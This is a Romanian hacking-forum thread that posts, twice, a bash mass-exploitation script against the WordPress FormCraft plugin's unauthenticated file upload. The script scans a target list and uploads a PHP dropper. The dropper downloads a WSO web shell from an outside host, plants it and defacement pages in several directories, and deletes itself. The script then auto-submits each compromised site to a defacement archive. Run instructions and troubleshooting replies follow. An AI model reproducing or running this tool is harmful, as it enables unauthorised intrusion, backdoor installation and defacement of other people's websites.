Wordpress Plugin Formcraft Exploiter [BASH]

Aerosol · December 8, 2014

Credit's to: CoupDeGrace

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit 
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo $1 >> hacked.txt
      echo ${1} > tmp/empes.txt
      ZoneH
     fi
    fi
  fi
}


CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Berhasil Dilakukan"
    CekDFC "http://${HOSTX}/lol.html" 1
    CekDFC "http://${HOSTX}/wp-content/lol.html" 1
   fi
}


ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
           curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
            --header "Host: www.zone-h.org" \
            --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
            --header "Accept-Language: en-US,en;q=0.5" \
            --header "Connection: keep-alive" \
            --header "Referer: http://zone-h.org/notify/single" \
            --request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
            cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
                FILEDX="tmp/${FCK}Result.txt"
                   RDOM1=$(sed -n '1p' < $FILEDX)
                    echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
                   if [ $warnai -eq 0 ];then
                   echo "$urlnya" >> log/postOK.txt
                   echo "Upload web $urlnya ke Zone-H: OK"
                    else
                   echo "$urlnya" >> log/postError.txt
                   echo "=> Upload to Zone-H $urlnya : ERROR"
                   echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
                   fi
    echo "$urlnya" >> log/defaced.txt
fi
continue
}

Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST  "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Found ${HOSTX}"
   $3
   else
   echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

save the script with .sh format

run the command bash namafile.sh and enter your target list

Edited December 8, 2014 by Aerosol

quadxenon · December 8, 2014

Tu probezi vreo saracie de asta inainte sa pui ?

Aerosol · December 8, 2014

@quadxenon daca nu esti in stare sa faci nici macar atat, scuze dar locul tau nu e aici.

era o problema si anume

Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

trebuia inclusa.

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit 
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo $1 >> hacked.txt
      echo ${1} > tmp/empes.txt
      ZoneH
     fi
    fi
  fi
}


CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Berhasil Dilakukan"
    CekDFC "http://${HOSTX}/lol.html" 1
    CekDFC "http://${HOSTX}/wp-content/lol.html" 1
   fi
}


ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
           curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
            --header "Host: www.zone-h.org" \
            --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
            --header "Accept-Language: en-US,en;q=0.5" \
            --header "Connection: keep-alive" \
            --header "Referer: http://zone-h.org/notify/single" \
            --request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
            cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
                FILEDX="tmp/${FCK}Result.txt"
                   RDOM1=$(sed -n '1p' < $FILEDX)
                    echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
                   if [ $warnai -eq 0 ];then
                   echo "$urlnya" >> log/postOK.txt
                   echo "Upload web $urlnya ke Zone-H: OK"
                    else
                   echo "$urlnya" >> log/postError.txt
                   echo "=> Upload to Zone-H $urlnya : ERROR"
                   echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
                   fi
    echo "$urlnya" >> log/defaced.txt
fi
continue
}

Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST  "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Found ${HOSTX}"
   $3
   else
   echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

cat despre testat acesta nu l-am testat fiindca e luat de pe un site de incredere.

Pe viitor te-as ruga sa nu mai faci offtopic la posturile mele...

Edited December 8, 2014 by Aerosol

quadxenon · December 8, 2014

Ba bolovanule , probasem ala ca eram sigur ca postezi fara sa testezi, nu ca m-ar fi interesat.Si da, nu le am cu programare,Linux sau alte chestii. Imi petrec timpul cu altceva decat sa stau 23 ore din 24 forum.

florinul · December 8, 2014

nu merge nici la mine cum adica trebuie inclusa?

Aerosol · December 9, 2014

@florinul ai incercat cu al doilea cod si ai facut tot ce am zis?

florinul · December 9, 2014

aerosol am incercat si tot da eroarea care am postat-o mai sus . mai da odata quote la cod gata modificat cum ar trebuii sa mearga sa mai incerc odata ..

Eric · December 10, 2014

aerosol am incercat si tot da eroarea care am postat-o mai sus . mai da odata quote la cod gata modificat cum ar trebuii sa mearga sa mai incerc odata ..

de ce ? ca sa vinzi iar pe site-urile de profil ce fixeaza baietii de pe rst?

CoupDeGrace · January 21, 2015

Simple , if u have error just convert with command dos2unix yourfile.sh

u can contact me @ coupdegracegantengers@yahoo.co.id / or facebook : Coup De Grace | Facebook

Sign In

Wordpress Plugin Formcraft Exploiter [BASH]

Recommended Posts

Aerosol

quadxenon

Aerosol

quadxenon

florinul

Aerosol

florinul

Eric

CoupDeGrace

Join the conversation

Browse

Activity

Pages